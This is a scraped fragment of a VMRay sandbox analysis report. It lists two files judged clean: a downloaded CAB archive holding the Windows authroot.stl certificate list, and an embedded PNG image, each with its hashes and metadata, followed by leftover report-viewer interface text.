ImpHash -
c:\users\keecfmwgj\appdata\local\temp\cab374e.tmp Downloaded File CAB
clean
...
»
Parent File analysis.pcap
MIME Type application/vnd.ms-cab-compressed
File Size 59.97 KB
MD5 acaeda60c79c6bcac925eeb3653f45e0 Copy to Clipboard
SHA1 2aaae490bcdaccc6172240ff1697753b37ac5578 Copy to Clipboard
SHA256 6b0ceccf0103afd89844761417c1d23acc41f8aebf3b7230765209b61eee5658 Copy to Clipboard
SSDeep 1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP Copy to Clipboard
ImpHash -
Archive Information
»
Number of Files 1
Number of Folders 0
Size of Packed Archive Contents 157.81 KB
Size of Unpacked Archive Contents 157.81 KB
File Format cab
Contents (1)
»
File Name Packed Size Unpacked Size Compression Is Encrypted Modify Time Severity Recursively Submitted Actions
authroot.stl 157.81 KB 157.81 KB MSZip False 2021-10-18 15:18 (UTC+2)
Clean
-
...
0.png Embedded File Image
clean
...
»
Parent File c:\users\keecfmwgj\desktop\15eab100
MIME Type image/png
File Size 74.02 KB
MD5 c6fce278e0ef97fccb5eefb70ff6e7e8 Copy to Clipboard
SHA1 6ae93ce6423830509145e74b1d4a579c86e6dcb9 Copy to Clipboard
SHA256 b3d17ce1ecb565498388bb5c5b19d5011a8b9034f00bd18944f01edce91049b9 Copy to Clipboard
SSDeep 1536:InyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXO:IyVEoBo6hKb4llGsQjbxe Copy to Clipboard
ImpHash -
VMRay - Analyzer - www.vmray.com
Legal Note - Privacy Policy
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image